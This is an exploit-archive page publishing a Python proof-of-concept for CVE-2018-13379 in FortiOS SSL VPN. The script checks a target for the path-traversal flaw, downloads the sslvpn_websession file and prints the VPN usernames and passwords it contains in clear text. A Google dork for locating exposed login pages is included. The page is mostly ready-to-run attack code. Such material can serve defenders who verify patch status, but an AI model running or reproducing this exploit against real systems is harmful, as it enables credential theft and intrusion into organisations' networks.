exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

FortiOS 5.6.7 / 6.0.4 Credential Disclosure

FortiOS 5.6.7 / 6.0.4 Credential Disclosure
Posted Aug 19, 2019
Authored by Carlos E. Vieira

FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 suffer from a credential disclosure vulnerability.

tags | exploit, info disclosure
advisories | CVE-2018-13379
SHA-256 | b2b3f4a059a819d179d1351df2449ee136c21fac4545ee3a69e597459c9fbae5

FortiOS 5.6.7 / 6.0.4 Credential Disclosure

Change Mirror Download
# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379

# Exploit SSLVPN Fortinet - FortiOs
#!/usr/bin/env python
import requests, sys, time
import urllib3
urllib3.disable_warnings()


def leak(host, port):
print("[!] Leak information...")
try:
url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
r=requests.get(url, headers=headers, verify=False, stream=True)
img=r.raw.read()
if "var fgt_lang =" in str(img):
with open("sslvpn_websession_"+host+".dat", 'w') as f:
f.write(img)
print("[>] Save to file ....")
parse(host)
print("\n")
return True
else:
return False
except requests.exceptions.ConnectionError:
return False
def is_character_printable(s):
return all((ord(c) < 127) and (ord(c) >= 32) for c in s)

def is_printable(byte):
if is_character_printable(byte):
return byte
else:
return '.'

def read_bytes(host, chunksize=8192):
print("[>] Read bytes from > " + "sslvpn_websession"+host+".dat")
with open("sslvpn_websession_"+host+".dat", "rb") as f:
while True:
chunk = f.read(chunksize)
if chunk:
for b in chunk:
yield b
else:
break
def parse(host):
print("[!] Parsing Information...")
memory_address = 0
ascii_string = ""
for byte in read_bytes(host):
ascii_string = ascii_string + is_printable(byte)
if memory_address%61 == 60:
if ascii_string!=".............................................................":
print ascii_string
ascii_string = ""
memory_address = memory_address + 1

def check(host, port):
print("[!] Check vuln...")
uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
try:
r = requests.get("https://" + host + ":" + port + uri, verify=False)
if(r.status_code == 200):
return True
elif(r.status_code == 404):
return False
else:
return False
except:
return False
def main(host, port):
print("[+] Start exploiting....")
vuln = check(host, port)
if(vuln):
print("[+] Target is vulnerable!")
bin_file = leak(host, port)
else:
print("[X] Target not vulnerable.")

if __name__ == "__main__":

if(len(sys.argv) < 3):
print("Use: python {} ip/dns port".format(sys.argv[0]))
else:
host = sys.argv[1]
port = sys.argv[2]
main(host, port)
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close